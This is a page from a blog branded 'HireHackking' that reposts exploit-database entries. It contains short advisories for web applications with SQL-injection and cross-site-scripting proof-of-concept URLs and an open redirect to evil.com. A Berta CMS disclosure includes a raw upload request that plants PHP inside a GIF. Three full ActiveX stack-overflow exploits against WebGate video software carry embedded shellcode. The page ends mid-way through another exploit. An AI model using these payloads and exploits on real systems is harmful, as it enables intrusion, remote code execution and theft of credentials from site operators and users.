Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863285370

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/51321/info

ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
HireHackking 
source: https://www.securityfocus.com/bid/51317/info
 
Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/pageE.php?id=118+order+by+10--
HireHackking 
source: https://www.securityfocus.com/bid/51418/info

PHP Ringtone Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/51416/info

PHP Membership Site Manager Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHP Membership Site Manager Script version 2.1 and prior are vulnerable.

http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/51411/info

The HD Video Share ('com_contushdvideoshare') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HD Video Share 1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14
http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a
HireHackking 
source: https://www.securityfocus.com/bid/51404/info

Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A
HireHackking 
source: https://www.securityfocus.com/bid/51401/info

MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

The following MailEnable versions are vulnerable:
Professional, Enterprise, and Premium 4.26 and prior versions
Professional, Enterprise, and Premium 5.52 and prior versions
Professional, Enterprise, and Premium 6.02 and prior versions 

http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/51393/info

GreenBrowser is prone to a remote use-after-free memory-corruption vulnerability.

Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.

GreenBrowser 6.0.1002 and prior versions are vulnerable. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36546.rar
HireHackking 
source: https://www.securityfocus.com/bid/51389/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.

NOTE: This issue affects Linux kernels running as guest images. 

[bits 32]
global _start
SECTION .text
_start: syscall
HireHackking 
source: https://www.securityfocus.com/bid/51373/info

KnowledgeTree is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

KnowledgeTree 3.7.0.2 is vulnerable; prior versions may also be affected. 

http://www.example.com/login.php/%22onmouseover=alert%28document.cookie%29;%3E
http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
http://www.example.com/preferences.php/%22onmouseover=alert%28document.cookie%29;%3E
HireHackking 
source: https://www.securityfocus.com/bid/51377/info

Kayako SupportSuite is prone to the following vulnerabilities:

1. Multiple HTML-injection vulnerabilities.
2. A remote code-execution vulnerability.
3. Multiple cross-site scripting vulnerabilities.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable. 

Remote code-execution:
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register

Cross-site scripting:
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9

http://www.example.com/support/staff/index.php?_m=news&_a=managenews

http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories

http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles

http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]

http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking

http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses

http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts

http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters
HireHackking 
source: https://www.securityfocus.com/bid/51367/info

ExpressView Browser Plug-in is prone to multiple integer overflow and remote code-execution vulnerabilities.

Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.

ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36542.zip
HireHackking 
source: https://www.securityfocus.com/bid/51365/info

PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHP-Fusion 7.02.04 is vulnerable; other versions may also be affected. 

http://www.example.com/[Path]/downloads.php?cat_id=[Xss]
HireHackking 
source: https://www.securityfocus.com/bid/51357/info

WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

WordPress Age Verification plugin 0.4 and prior versions are vulnerable. 

http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
HireHackking 
source: https://www.securityfocus.com/bid/51339/info

Advanced File Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Advanced File Management 1.4 is vulnerable; other versions may also be affected. 

http://www.example.com/users.php?page=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/51338/info

Gregarius is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Gregarius versions 0.6.1 and prior are vulnerable. 

http://www.example.com/?page=1[it'shere]&media=rss&
http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8[it'shere xss with sql]
http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
HireHackking 
source: https://www.securityfocus.com/bid/51337/info

SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or conduct phishing attacks. Other attacks are also possible.

AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected. 

http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*

http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction=
HireHackking 
source: https://www.securityfocus.com/bid/51317/info

Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/gallery_e.php?id=118+order+by+10--
HireHackking 
Berta CMS is a web based content management system using PHP and local file storage.

http://www.berta.me/

Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.

We found that the file upload didn't require authentication.

Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.

It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>

We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.

The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26

The berta-0.8.10b.zip file from: http://www.berta.me/download/  includes a fix that requires authentication to upload files.


This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).


The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.

POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php

GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ3ffÌÌÿÌÿÌÌf3f 33 f3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢s›& ^ŸŽ¡a«¦´µ?¨©g³$­]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 
ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ   p §Qd‹
P­s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö­a[q¥Î•P—Ë]Yy o„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë  ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôºþ' f XCÅuýÜÆ ~áíç ý¹âÞqê  xÐ7Þ}ÑP{  ®ç Ö„Ôàƒ$
¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <­H£A5å‚£$;FÉ£ŒJúw Z  žŠ -ƒ$ ¡Iõ "Ob#å8ô¸Í ˜e)avu@ä— „6f"pŠ æž5¨‰Ð XVù&r v  
3jy'ž„šÉç£/øY …B
h¤œ^ž f<‹’FP‹(n  %¤¤² )›q
*{\j0§¦už *f;©ê£¨Ž–ª«  § Ú¦­kÒ¥`ž‚
k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/*
`ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«­ £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ É ³&¸ ­Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ´F6É rÝuÖV³­²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k­øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°<
éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ  ;

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------2147563051636691175750543802--




Simon Waters
HireHackking 
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com
http://darshanams.blogspot.com

# Exploit Title: WebGate eDVR Manager SiteName Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: eDVR Manager 2.6.4
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2098

WebGate eDVR Manager WESPPlayback.WESPPlaybackCtrl.1 SiteName Property Stack Buffer Overflow Remote Code Execution Vulnerability
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Property Let SiteName ( ByVal SiteSerialNumber As String ) As String"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='sname'>
</object>
<script>
var buff1= "";
var buff2= "PraveenD";
var nops = "";

for (i=0; i<128; i++)
{
	buff1 += "B";
}
var nseh = "\xeb\x08PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
	nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(8000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
	buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
sname.SiteName(fbuff) = buff2;

</script>
</html>
HireHackking 
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com

# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2099

targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub GetThumbnail ( ByVal SiteSerialNumber As String ,  ByVal Channel As Integer ,  ByVal secTime As Long ,  ByVal miliTime As Integer )"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->

<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>
</object>
<script>

var buff1 = "";
var arg2=1;
var arg3=1;
var arg4=1;
var nops = "";
var buff2 = "";

for (i=0;i<24; i++)
{
	buff1 += "B";
}

// jump over seh to shellcode
nseh = "\xeb\x08PD";
// pop pop ret
var seh = "\xa0\xf2\x07\x10";

for (i=0;i<80; i++)
{
	nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";

for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
	buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);

</script>
</html>
HireHackking 
<html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
# Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day)
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Date: 27th March, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
# Version: WinRDS 2.0.8
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2094

targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'>
</object>
<script>

var buff1 = "";
var nops = "";
var buff2 = "";

for (i=0;i<128; i++)
{
	buff1 += "B";
}

nseh = "\xeb\x08PD";
//pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
	nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
	buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);

</script>
</html>
HireHackking 
<?php
###########################################
#-----------------------------------------#
